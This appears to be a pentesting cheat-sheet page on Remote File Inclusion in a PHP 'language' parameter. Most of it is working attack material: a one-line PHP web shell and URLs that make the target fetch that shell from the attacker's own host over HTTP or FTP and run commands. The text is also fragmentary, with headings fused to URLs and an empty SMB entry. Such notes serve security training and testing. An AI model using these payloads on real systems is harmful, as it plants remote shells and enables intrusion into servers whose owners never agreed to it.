Remote File Inclusion (RFI)
http://<SERVER_IP>:<PORT>/index.php?language=http://127.0.0.1:80/index.phpRemote Code Execution with RFI
echo '<?php system($_GET["cmd"]); ?>' > shell.phphttp://<SERVER_IP>:<PORT>/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=idFTP
http://<SERVER_IP>:<PORT>/index.php?language=ftp://<OUR_IP>/shell.php&cmd=idSMB
Last updated